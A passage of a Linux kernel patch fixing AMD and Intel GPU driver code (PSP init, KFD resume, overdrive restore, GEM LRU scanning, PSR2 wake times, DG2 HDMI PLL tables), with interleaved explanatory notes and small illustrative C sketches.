++	if (!psp->hdcp_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->hdcp_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+@@ -1762,7 +1762,7 @@ static int psp_dtm_initialize(struct psp_context *psp)
+ 	psp->dtm_context.context.mem_context.shared_mem_size = PSP_DTM_SHARED_MEM_SIZE;
+ 	psp->dtm_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->dtm_context.context.initialized) {
++	if (!psp->dtm_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->dtm_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+@@ -1830,7 +1830,7 @@ static int psp_rap_initialize(struct psp_context *psp)
+ 	psp->rap_context.context.mem_context.shared_mem_size = PSP_RAP_SHARED_MEM_SIZE;
+ 	psp->rap_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->rap_context.context.initialized) {
++	if (!psp->rap_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->rap_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device.c b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+index 65a1d4f9004ba..a75e1af77365d 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+@@ -59,6 +59,7 @@ static int kfd_gtt_sa_init(struct kfd_dev *kfd, unsigned int buf_size,
+ 				unsigned int chunk_size);
+ static void kfd_gtt_sa_fini(struct kfd_dev *kfd);
+ 
++static int kfd_resume_iommu(struct kfd_dev *kfd);
+ static int kfd_resume(struct kfd_dev *kfd);
+ 
+ static void kfd_device_info_set_sdma_info(struct kfd_dev *kfd)
+@@ -634,7 +635,7 @@ bool kgd2kfd_device_init(struct kfd_dev *kfd,
+ 
+ 	svm_migrate_init(kfd->adev);
+ 
+-	if (kgd2kfd_resume_iommu(kfd))
++	if (kfd_resume_iommu(kfd))
+ 		goto device_iommu_error;
+ 
+ 	if (kfd_resume(kfd))
+@@ -782,6 +783,14 @@ int kgd2kfd_resume(struct kfd_dev *kfd, bool run_pm)
+ }
+ 
+ int kgd2kfd_resume_iommu(struct kfd_dev *kfd)
++{
++	if (!kfd->init_complete)
++		return 0;
++
++	return kfd_resume_iommu(kfd);
++}
++
++static int kfd_resume_iommu(struct kfd_dev *kfd)
+ {
+ 	int err = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_events.c b/drivers/gpu/drm/amd/amdkfd/kfd_events.c
+index 729d26d648af3..2880ed96ac2e3 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_events.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_events.c
+@@ -778,16 +778,13 @@ static struct kfd_event_waiter *alloc_event_waiters(uint32_t num_events)
+ 	struct kfd_event_waiter *event_waiters;
+ 	uint32_t i;
+ 
+-	event_waiters = kmalloc_array(num_events,
+-					sizeof(struct kfd_event_waiter),
+-					GFP_KERNEL);
++	event_waiters = kcalloc(num_events, sizeof(struct kfd_event_waiter),
++				GFP_KERNEL);
+ 	if (!event_waiters)
+ 		return NULL;
+ 
+-	for (i = 0; (event_waiters) && (i < num_events) ; i++) {
++	for (i = 0; i < num_events; i++)
+ 		init_wait(&event_waiters[i].wait);
+-		event_waiters[i].activated = false;
+-	}
+ 
+ 	return event_waiters;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index 8c50457112649..c20e9f76f0213 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -992,8 +992,5 @@ void dcn30_prepare_bandwidth(struct dc *dc,
+ 			dc->clk_mgr->funcs->set_max_memclk(dc->clk_mgr, dc->clk_mgr->bw_params->clk_table.entries[dc->clk_mgr->bw_params->clk_table.num_entries - 1].memclk_mhz);
+ 
+ 	dcn20_prepare_bandwidth(dc, context);
+-
+-	dc_dmub_srv_p_state_delegate(dc,
+-		context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching, context);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index d70c64a9fcb2c..26fc5cad7a770 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1883,6 +1883,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 	bool subvp_in_use = false;
+ 	uint8_t is_pipe_split_expected[MAX_PIPES] = {0};
+ 	struct dc_crtc_timing *timing;
++	bool vsr_odm_support = false;
+ 
+ 	dcn20_populate_dml_pipes_from_context(dc, context, pipes, fast_validate);
+ 
+@@ -1900,12 +1901,15 @@ int dcn32_populate_dml_pipes_from_context(
+ 		timing = &pipe->stream->timing;
+ 
+ 		pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_dal;
++		vsr_odm_support = (res_ctx->pipe_ctx[i].stream->src.width >= 5120 &&
++				res_ctx->pipe_ctx[i].stream->src.width > res_ctx->pipe_ctx[i].stream->dst.width);
+ 		if (context->stream_count == 1 &&
+ 				context->stream_status[0].plane_count == 1 &&
+ 				!dc_is_hdmi_signal(res_ctx->pipe_ctx[i].stream->signal) &&
+ 				is_h_timing_divisible_by_2(res_ctx->pipe_ctx[i].stream) &&
+ 				pipe->stream->timing.pix_clk_100hz * 100 > DCN3_2_VMIN_DISPCLK_HZ &&
+-				dc->debug.enable_single_display_2to1_odm_policy) {
++				dc->debug.enable_single_display_2to1_odm_policy &&
++				!vsr_odm_support) { //excluding 2to1 ODM combine on >= 5k vsr
+ 			pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_2to1;
+ 		}
+ 		pipe_cnt++;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+index 479e2c1a13018..49da8119b28e9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+@@ -1802,7 +1802,10 @@ static unsigned int CalculateVMAndRowBytes(
+ 	}
+ 
+ 	if (SurfaceTiling == dm_sw_linear) {
+-		*dpte_row_height = dml_min(128, 1 << (unsigned int) dml_floor(dml_log2(PTEBufferSizeInRequests * *PixelPTEReqWidth / Pitch), 1));
++		if (PTEBufferSizeInRequests == 0)
++			*dpte_row_height = 1;
++		else
++			*dpte_row_height = dml_min(128, 1 << (unsigned int) dml_floor(dml_log2(PTEBufferSizeInRequests * *PixelPTEReqWidth / Pitch), 1));
+ 		*dpte_row_width_ub = (dml_ceil(((double) SwathWidth - 1) / *PixelPTEReqWidth, 1) + 1) * *PixelPTEReqWidth;
+ 		*PixelPTEBytesPerRow = *dpte_row_width_ub / *PixelPTEReqWidth * *PTERequestSize;
+ 	} else if (ScanDirection != dm_vert) {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
+index f77401709d83c..2162ecd1057d1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
+@@ -27,7 +27,7 @@
+ // *** IMPORTANT ***
+ // SMU TEAM: Always increment the interface version if
+ // any structure is changed in this file
+-#define PMFW_DRIVER_IF_VERSION 7
++#define PMFW_DRIVER_IF_VERSION 8
+ 
+ typedef struct {
+   int32_t value;
+@@ -198,7 +198,7 @@ typedef struct {
+   uint16_t SkinTemp;
+   uint16_t DeviceState;
+   uint16_t CurTemp;                     //[centi-Celsius]
+-  uint16_t spare2;
++  uint16_t FilterAlphaValue;
+ 
+   uint16_t AverageGfxclkFrequency;
+   uint16_t AverageFclkFrequency;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index 992163e66f7b4..bffa6247c3cda 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -29,7 +29,7 @@
+ #define SMU13_DRIVER_IF_VERSION_YELLOW_CARP 0x04
+ #define SMU13_DRIVER_IF_VERSION_ALDE 0x08
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x37
+-#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x07
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x08
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_5 0x04
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10 0x32
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_7 0x37
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 697e98a0a20ab..75f18681e984c 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2143,16 +2143,9 @@ static int sienna_cichlid_set_default_od_settings(struct smu_context *smu)
+ 		(OverDriveTable_t *)smu->smu_table.boot_overdrive_table;
+ 	OverDriveTable_t *user_od_table =
+ 		(OverDriveTable_t *)smu->smu_table.user_overdrive_table;
++	OverDriveTable_t user_od_table_bak;
+ 	int ret = 0;
+ 
+-	/*
+-	 * For S3/S4/Runpm resume, no need to setup those overdrive tables again as
+-	 *   - either they already have the default OD settings got during cold bootup
+-	 *   - or they have some user customized OD settings which cannot be overwritten
+-	 */
+-	if (smu->adev->in_suspend)
+-		return 0;
+-
+ 	ret = smu_cmn_update_table(smu, SMU_TABLE_OVERDRIVE,
+ 				   0, (void *)boot_od_table, false);
+ 	if (ret) {
+@@ -2163,7 +2156,23 @@ static int sienna_cichlid_set_default_od_settings(struct smu_context *smu)
+ 	sienna_cichlid_dump_od_table(smu, boot_od_table);
+ 
+ 	memcpy(od_table, boot_od_table, sizeof(OverDriveTable_t));
+-	memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++
++	/*
++	 * For S3/S4/Runpm resume, we need to setup those overdrive tables again,
++	 * but we have to preserve user defined values in "user_od_table".
++	 */
++	if (!smu->adev->in_suspend) {
++		memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++		smu->user_dpm_profile.user_od = false;
++	} else if (smu->user_dpm_profile.user_od) {
++		memcpy(&user_od_table_bak, user_od_table, sizeof(OverDriveTable_t));
++		memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++		user_od_table->GfxclkFmin = user_od_table_bak.GfxclkFmin;
++		user_od_table->GfxclkFmax = user_od_table_bak.GfxclkFmax;
++		user_od_table->UclkFmin = user_od_table_bak.UclkFmin;
++		user_od_table->UclkFmax = user_od_table_bak.UclkFmax;
++		user_od_table->VddGfxOffset = user_od_table_bak.VddGfxOffset;
++	}
+ 
+ 	return 0;
+ }
+@@ -2373,6 +2382,20 @@ static int sienna_cichlid_od_edit_dpm_table(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int sienna_cichlid_restore_user_od_settings(struct smu_context *smu)
++{
++	struct smu_table_context *table_context = &smu->smu_table;
++	OverDriveTable_t *od_table = table_context->overdrive_table;
++	OverDriveTable_t *user_od_table = table_context->user_overdrive_table;
++	int res;
++
++	res = smu_v11_0_restore_user_od_settings(smu);
++	if (res == 0)
++		memcpy(od_table, user_od_table, sizeof(OverDriveTable_t));
++
++	return res;
++}
++
+ static int sienna_cichlid_run_btc(struct smu_context *smu)
+ {
+ 	int res;
+@@ -4400,7 +4423,7 @@ static const struct pptable_funcs sienna_cichlid_ppt_funcs = {
+ 	.set_soft_freq_limited_range = smu_v11_0_set_soft_freq_limited_range,
+ 	.set_default_od_settings = sienna_cichlid_set_default_od_settings,
+ 	.od_edit_dpm_table = sienna_cichlid_od_edit_dpm_table,
+-	.restore_user_od_settings = smu_v11_0_restore_user_od_settings,
++	.restore_user_od_settings = sienna_cichlid_restore_user_od_settings,
+ 	.run_btc = sienna_cichlid_run_btc,
+ 	.set_power_source = smu_v11_0_set_power_source,
+ 	.get_pp_feature_mask = smu_cmn_get_pp_feature_mask,
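
[Editorial note, not part of the patch] The sienna_cichlid change above re-reads the boot overdrive table on every resume but keeps the user's clock/voltage overrides by backing them up first. A hedged sketch of that save/reset/re-apply shape, with od_table and its three fields as stand-ins for OverDriveTable_t:

	#include <stdbool.h>
	#include <string.h>

	struct od_table { int fmin, fmax, voff; };	/* stand-in fields */

	static void restore_od_on_resume(struct od_table *user,
					 const struct od_table *boot,
					 bool user_od)
	{
		struct od_table bak;

		memcpy(&bak, user, sizeof(bak));	/* save user tuning */
		memcpy(user, boot, sizeof(*user));	/* reset to defaults */
		if (user_od) {				/* re-apply overrides */
			user->fmin = bak.fmin;
			user->fmax = bak.fmax;
			user->voff = bak.voff;
		}
	}
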
+diff --git a/drivers/gpu/drm/drm_gem.c b/drivers/gpu/drm/drm_gem.c
+index 8b68a3c1e6ab6..b87ed4238fc83 100644
+--- a/drivers/gpu/drm/drm_gem.c
++++ b/drivers/gpu/drm/drm_gem.c
+@@ -1351,10 +1351,13 @@ EXPORT_SYMBOL(drm_gem_lru_move_tail);
+  *
+  * @lru: The LRU to scan
+  * @nr_to_scan: The number of pages to try to reclaim
++ * @remaining: The number of pages left to reclaim; must be initialized by the caller
+  * @shrink: Callback to try to shrink/reclaim the object.
+  */
+ unsigned long
+-drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
++drm_gem_lru_scan(struct drm_gem_lru *lru,
++		 unsigned int nr_to_scan,
++		 unsigned long *remaining,
+ 		 bool (*shrink)(struct drm_gem_object *obj))
+ {
+ 	struct drm_gem_lru still_in_lru;
+@@ -1393,8 +1396,10 @@ drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
+ 		 * hit shrinker in response to trying to get backing pages
+ 		 * for this obj (ie. while it's lock is already held)
+ 		 */
+-		if (!dma_resv_trylock(obj->resv))
++		if (!dma_resv_trylock(obj->resv)) {
++			*remaining += obj->size >> PAGE_SHIFT;
+ 			goto tail;
++		}
+ 
+ 		if (shrink(obj)) {
+ 			freed += obj->size >> PAGE_SHIFT;
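
[Editorial note, not part of the patch] drm_gem_lru_scan() now reports, through the new *remaining argument, the pages it skipped because an object's reservation lock was contended, letting callers distinguish "everything was busy" from "the LRU is empty". An illustrative, self-contained sketch of the loop shape (struct obj, try_lock() and do_shrink() are stand-ins, not DRM API):

	#include <stdbool.h>

	struct obj {
		unsigned long pages;
		bool locked;	/* stand-in for the dma_resv lock */
	};

	static bool try_lock(struct obj *o)
	{
		if (o->locked)
			return false;
		o->locked = true;
		return true;
	}

	static void unlock(struct obj *o) { o->locked = false; }

	/* Placeholder for the caller-supplied shrink callback. */
	static bool do_shrink(struct obj *o) { (void)o; return true; }

	static unsigned long scan(struct obj **list, unsigned int n,
				  unsigned long *remaining)
	{
		unsigned long freed = 0;
		unsigned int i;

		for (i = 0; i < n; i++) {
			struct obj *o = list[i];

			if (!try_lock(o)) {
				/* Busy, not gone: count it so the caller can
				 * tell "contended" apart from "LRU empty". */
				*remaining += o->pages;
				continue;
			}
			if (do_shrink(o))
				freed += o->pages;
			unlock(o);
		}
		return freed;
	}
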
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index 7af9da886d4e5..5fdc608043e76 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -622,11 +622,14 @@ int drm_gem_shmem_mmap(struct drm_gem_shmem_object *shmem, struct vm_area_struct
+ 	int ret;
+ 
+ 	if (obj->import_attach) {
+-		/* Drop the reference drm_gem_mmap_obj() acquired.*/
+-		drm_gem_object_put(obj);
+ 		vma->vm_private_data = NULL;
++		ret = dma_buf_mmap(obj->dma_buf, vma, 0);
++
++		/* Drop the reference drm_gem_mmap_obj() acquired. */
++		if (!ret)
++			drm_gem_object_put(obj);
+ 
+-		return dma_buf_mmap(obj->dma_buf, vma, 0);
++		return ret;
+ 	}
+ 
+ 	ret = drm_gem_shmem_get_pages(shmem);
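
[Editorial note, not part of the patch] The drm_gem_shmem_mmap() fix above reorders the reference drop: when dma_buf_mmap() fails, the caller's error path still drops the reference drm_gem_mmap_obj() took, so dropping it here too would underflow the refcount. A minimal sketch of that put-only-on-success rule (put() and do_map() are hypothetical stand-ins):

	#include <errno.h>

	struct object { int refs; };

	static void put(struct object *o) { o->refs--; }

	/* Hypothetical operation that may fail. */
	static int do_map(struct object *o, int fail)
	{
		(void)o;
		return fail ? -EINVAL : 0;
	}

	/* Drop our reference only once the hand-off has succeeded;
	 * on failure the caller still owns it and will put it. */
	static int map_imported(struct object *o, int fail)
	{
		int ret = do_map(o, fail);

		if (!ret)
			put(o);
		return ret;
	}
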
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index 135dbcab62b28..63b7105e818a6 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -1604,6 +1604,8 @@ struct intel_psr {
+ 	bool psr2_sel_fetch_cff_enabled;
+ 	bool req_psr2_sdp_prior_scanline;
+ 	u8 sink_sync_latency;
++	u8 io_wake_lines;
++	u8 fast_wake_lines;
+ 	ktime_t last_entry_attempt;
+ 	ktime_t last_exit;
+ 	bool sink_not_reliable;
+diff --git a/drivers/gpu/drm/i915/display/intel_psr.c b/drivers/gpu/drm/i915/display/intel_psr.c
+index 15c3e448aa0e6..bf18423c7a005 100644
+--- a/drivers/gpu/drm/i915/display/intel_psr.c
++++ b/drivers/gpu/drm/i915/display/intel_psr.c
+@@ -542,6 +542,14 @@ static void hsw_activate_psr2(struct intel_dp *intel_dp)
+ 	val |= EDP_PSR2_FRAME_BEFORE_SU(max_t(u8, intel_dp->psr.sink_sync_latency + 1, 2));
+ 	val |= intel_psr2_get_tp_time(intel_dp);
+ 
++	if (DISPLAY_VER(dev_priv) >= 12) {
++		if (intel_dp->psr.io_wake_lines < 9 &&
++		    intel_dp->psr.fast_wake_lines < 9)
++			val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
++		else
++			val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_3;
++	}
++
+ 	/* Wa_22012278275:adl-p */
+ 	if (IS_ADLP_DISPLAY_STEP(dev_priv, STEP_A0, STEP_E0)) {
+ 		static const u8 map[] = {
+@@ -558,31 +566,21 @@ static void hsw_activate_psr2(struct intel_dp *intel_dp)
+ 		 * Still using the default IO_BUFFER_WAKE and FAST_WAKE, see
+ 		 * comments below for more information
+ 		 */
+-		u32 tmp, lines = 7;
+-
+-		val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
++		u32 tmp;
+ 
+-		tmp = map[lines - TGL_EDP_PSR2_IO_BUFFER_WAKE_MIN_LINES];
++		tmp = map[intel_dp->psr.io_wake_lines - TGL_EDP_PSR2_IO_BUFFER_WAKE_MIN_LINES];
+ 		tmp = tmp << TGL_EDP_PSR2_IO_BUFFER_WAKE_SHIFT;
+ 		val |= tmp;
+ 
+-		tmp = map[lines - TGL_EDP_PSR2_FAST_WAKE_MIN_LINES];
++		tmp = map[intel_dp->psr.fast_wake_lines - TGL_EDP_PSR2_FAST_WAKE_MIN_LINES];
+ 		tmp = tmp << TGL_EDP_PSR2_FAST_WAKE_MIN_SHIFT;
+ 		val |= tmp;
+ 	} else if (DISPLAY_VER(dev_priv) >= 12) {
+-		/*
+-		 * TODO: 7 lines of IO_BUFFER_WAKE and FAST_WAKE are default
+-		 * values from BSpec. In order to setting an optimal power
+-		 * consumption, lower than 4k resolution mode needs to decrease
+-		 * IO_BUFFER_WAKE and FAST_WAKE. And higher than 4K resolution
+-		 * mode needs to increase IO_BUFFER_WAKE and FAST_WAKE.
+-		 */
+-		val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
+-		val |= TGL_EDP_PSR2_IO_BUFFER_WAKE(7);
+-		val |= TGL_EDP_PSR2_FAST_WAKE(7);
++		val |= TGL_EDP_PSR2_IO_BUFFER_WAKE(intel_dp->psr.io_wake_lines);
++		val |= TGL_EDP_PSR2_FAST_WAKE(intel_dp->psr.fast_wake_lines);
+ 	} else if (DISPLAY_VER(dev_priv) >= 9) {
+-		val |= EDP_PSR2_IO_BUFFER_WAKE(7);
+-		val |= EDP_PSR2_FAST_WAKE(7);
++		val |= EDP_PSR2_IO_BUFFER_WAKE(intel_dp->psr.io_wake_lines);
++		val |= EDP_PSR2_FAST_WAKE(intel_dp->psr.fast_wake_lines);
+ 	}
+ 
+ 	if (intel_dp->psr.req_psr2_sdp_prior_scanline)
+@@ -837,6 +835,46 @@ static bool _compute_psr2_sdp_prior_scanline_indication(struct intel_dp *intel_d
+ 	return true;
+ }
+ 
++static bool _compute_psr2_wake_times(struct intel_dp *intel_dp,
++				     struct intel_crtc_state *crtc_state)
++{
++	struct drm_i915_private *i915 = dp_to_i915(intel_dp);
++	int io_wake_lines, io_wake_time, fast_wake_lines, fast_wake_time;
++	u8 max_wake_lines;
++
++	if (DISPLAY_VER(i915) >= 12) {
++		io_wake_time = 42;
++		/*
++		 * According to Bspec it's 42us, but based on testing
++		 * it is not enough -> use 45 us.
++		 */
++		fast_wake_time = 45;
++		max_wake_lines = 12;
++	} else {
++		io_wake_time = 50;
++		fast_wake_time = 32;
++		max_wake_lines = 8;
++	}
++
++	io_wake_lines = intel_usecs_to_scanlines(
++		&crtc_state->uapi.adjusted_mode, io_wake_time);
++	fast_wake_lines = intel_usecs_to_scanlines(
++		&crtc_state->uapi.adjusted_mode, fast_wake_time);
++
++	if (io_wake_lines > max_wake_lines ||
++	    fast_wake_lines > max_wake_lines)
++		return false;
++
++	if (i915->params.psr_safest_params)
++		io_wake_lines = fast_wake_lines = max_wake_lines;
++
++	/* According to Bspec the lower limit should be set to 7 lines. */
++	intel_dp->psr.io_wake_lines = max(io_wake_lines, 7);
++	intel_dp->psr.fast_wake_lines = max(fast_wake_lines, 7);
++
++	return true;
++}
++
+ static bool intel_psr2_config_valid(struct intel_dp *intel_dp,
+ 				    struct intel_crtc_state *crtc_state)
+ {
+@@ -930,6 +968,12 @@ static bool intel_psr2_config_valid(struct intel_dp *intel_dp,
+ 		return false;
+ 	}
+ 
++	if (!_compute_psr2_wake_times(intel_dp, crtc_state)) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "PSR2 not enabled, Unable to use long enough wake times\n");
++		return false;
++	}
++
+ 	if (HAS_PSR2_SEL_FETCH(dev_priv)) {
+ 		if (!intel_psr2_sel_fetch_config_valid(intel_dp, crtc_state) &&
+ 		    !HAS_PSR_HW_TRACKING(dev_priv)) {
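
[Editorial note, not part of the patch] _compute_psr2_wake_times() converts the microsecond wake budgets into scanlines via intel_usecs_to_scanlines() and rejects PSR2 when the result exceeds the per-platform limit. A hedged re-derivation of that conversion (the 4k timing numbers below are example values, not from the patch): one scanline lasts htotal / pixel_clock, so lines = ceil(usecs * clock_khz / (1000 * htotal)).

	#include <stdint.h>

	static uint32_t usecs_to_scanlines(uint32_t clock_khz,
					   uint32_t htotal, uint32_t usecs)
	{
		uint64_t num = (uint64_t)usecs * clock_khz;
		uint64_t den = 1000ULL * htotal;

		return (uint32_t)((num + den - 1) / den);	/* round up */
	}

	/* Example: a ~594 MHz, htotal 4400 mode gives
	 * usecs_to_scanlines(594000, 4400, 42) == 6, which the patch
	 * then raises to the Bspec floor of 7 lines. */
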
+diff --git a/drivers/gpu/drm/i915/display/intel_snps_phy.c b/drivers/gpu/drm/i915/display/intel_snps_phy.c
+index 937cefd6f78f7..3326c79c78a0d 100644
+--- a/drivers/gpu/drm/i915/display/intel_snps_phy.c
++++ b/drivers/gpu/drm/i915/display/intel_snps_phy.c
+@@ -1418,6 +1418,36 @@ static const struct intel_mpllb_state dg2_hdmi_262750 = {
+ 		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
+ };
+ 
++static const struct intel_mpllb_state dg2_hdmi_267300 = {
++	.clock = 267300,
++	.ref_control =
++		REG_FIELD_PREP(SNPS_PHY_REF_CONTROL_REF_RANGE, 3),
++	.mpllb_cp =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT, 7) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP, 14) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT_GS, 64) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP_GS, 124),
++	.mpllb_div =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_DIV5_CLK_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_TX_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_PMIX_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_V2I, 2) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FREQ_VCO, 3),
++	.mpllb_div2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_REF_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_MULTIPLIER, 74) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_HDMI_DIV, 1),
++	.mpllb_fracn1 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_CGG_UPDATE_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_DEN, 65535),
++	.mpllb_fracn2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_QUOT, 30146) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_REM, 36699),
++	.mpllb_sscen =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
++};
++
+ static const struct intel_mpllb_state dg2_hdmi_268500 = {
+ 	.clock = 268500,
+ 	.ref_control =
+@@ -1508,6 +1538,36 @@ static const struct intel_mpllb_state dg2_hdmi_241500 = {
+ 		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
+ };
+ 
++static const struct intel_mpllb_state dg2_hdmi_319890 = {
++	.clock = 319890,
++	.ref_control =
++		REG_FIELD_PREP(SNPS_PHY_REF_CONTROL_REF_RANGE, 3),
++	.mpllb_cp =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT, 6) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP, 14) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT_GS, 64) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP_GS, 124),
++	.mpllb_div =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_DIV5_CLK_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_TX_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_PMIX_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_V2I, 2) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FREQ_VCO, 2),
++	.mpllb_div2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_REF_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_MULTIPLIER, 94) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_HDMI_DIV, 1),
++	.mpllb_fracn1 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_CGG_UPDATE_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_DEN, 65535),
++	.mpllb_fracn2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_QUOT, 64094) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_REM, 13631),
++	.mpllb_sscen =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
++};
++
+ static const struct intel_mpllb_state dg2_hdmi_497750 = {
+ 	.clock = 497750,
+ 	.ref_control =
+@@ -1695,8 +1755,10 @@ static const struct intel_mpllb_state * const dg2_hdmi_tables[] = {
+ 	&dg2_hdmi_209800,
+ 	&dg2_hdmi_241500,
+ 	&dg2_hdmi_262750,
++	&dg2_hdmi_267300,
+ 	&dg2_hdmi_268500,
+ 	&dg2_hdmi_296703,
++	&dg2_hdmi_319890,
+ 	&dg2_hdmi_497750,
+ 	&dg2_hdmi_592000,
+ 	&dg2_hdmi_593407,
+diff --git a/drivers/gpu/drm/i915/gt/intel_sseu.h b/drivers/gpu/drm/i915/gt/intel_sseu.h
